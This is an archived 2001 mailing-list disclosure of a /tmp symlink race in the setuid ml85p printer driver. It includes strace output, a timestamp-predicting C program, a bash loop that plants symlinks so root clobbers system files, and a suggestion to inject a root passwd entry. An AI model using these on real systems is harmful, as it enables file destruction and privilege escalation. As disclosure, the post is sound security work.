ml85p - driver for Samsung ML-85G GDI printers seems to use /tmp unsecurely. it seems to use the time() function to determine the /tmp files name. [root@linux exp]# strings /usr/bin/ml85p | grep tmp /tmp/ml85g%d [401070dd] iopl(0x3) = 0 [400cf2bd] time(NULL) = 994462668 [40100cbf] brk(0) = 0x8064544 [40100cbf] brk(0x80646c4) = 0x80646c4 [40100cbf] brk(0x8065000) = 0x8065000 [400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3 TIME(2) Linux Programmer's Manual TIME(2) NAME time - get time in seconds SYNOPSIS #include <time.h> time_t time(time_t *t); DESCRIPTION time returns the time since the Epoch (00:00:00 UTC, January 1, 1970), mea- sured in seconds. [d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462666 [d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462667 [d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462668 This is trivial... root must run the following command. [root@linux exp]# /usr/bin/ml85p -s -s simulate the printing process, but write the compressed output to a /tmp/ml85xxxxxxxx file, where the filename suffix is the current time in time_t units (seconds since 12/31/1970). as you can see this is the one that hits us... [400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3 oh how nice truncation flag... O_TRUNC If the file already exists and is a regular file and the open mode allows writing (i.e., is O_RDWR or O_WRONLY) it will be truncated to length 0. [root@linux exp]# ls -al /tmp | grep ml -rw-r--r-- 1 root root 0 Jul 6 19:37 ml85g994462665 lrwxrwxrwx 1 d0tslash d0tslash 9 Jul 6 19:37 ml85g994462666 -> /etc/test lrwxrwxrwx 1 d0tslash d0tslash 9 Jul 6 19:37 ml85g994462667 -> /etc/test lrwxrwxrwx 1 d0tslash d0tslash 9 Jul 6 19:37 ml85g994462668 -> /etc/test -rw-r--r-- 1 root root 0 Jul 6 19:37 ml85g994462669 -rw-r--r-- 1 root root 0 Jul 6 19:37 ml85g994462670 [d0tslash@linux d0tslash]$ ls -al /etc/test -rw-r--r-- 1 root root 0 Jul 6 19:37 /etc/test I am not sure what other OS's pick for permissions by defualt... mandrake seems to not allow user access by default ... I don't know what group you need to have access to use this feature. [d0tslash@linux d0tslash]$ /usr/bin/ml85p bash: /usr/bin/ml85p: Permission denied [d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p -rwsr-x--- 1 root sys 11676 Mar 30 11:43 /usr/bin/ml85p* for shits and giggles lets see what happens if its got bad perms. [root@linux exp]# chmod 4755 /usr/bin/ml85p in which case the results are as follows [d0tslash@linux d0tslash]$ /usr/bin/ml85p -s (several times) -rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463605 -rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463607 -rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463608 -rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463609 [d0tslash@linux d0tslash]$ cat ml85p-exp.c // ln -s /etc/oops /tmp/ml85`./ml85p-exp` #include <time.h> #include <stdio.h> int main(int argc,char **argv) { int x = time(NULL); x = x + 30; printf("%i\n", x); } [d0tslash@linux d0tslash]$ cat ml85p.sh #!/bin/bash # krfinisterreat_private echo "brute.sh <low> <hi>" L=$1 H=$2 while [ $L -lt $H ] do ln -s /etc/oops /tmp/ml85g`./ml85p-exp` let L=L+1 done the following file is created. -rw-r--r-- 1 root d0tslash 0 Jul 6 20:18 /etc/oops not sure what use this is short of clobbering files... since the output is sent to this file it may be possible to print owned::0:0:root:/root:/bin/bash to this driver and it may append it to the file in /tmp... I am not sure though... just an idea -KF
This archive was generated by hypermail 2b30 : Tue Jul 10 2001 - 09:45:27 PDT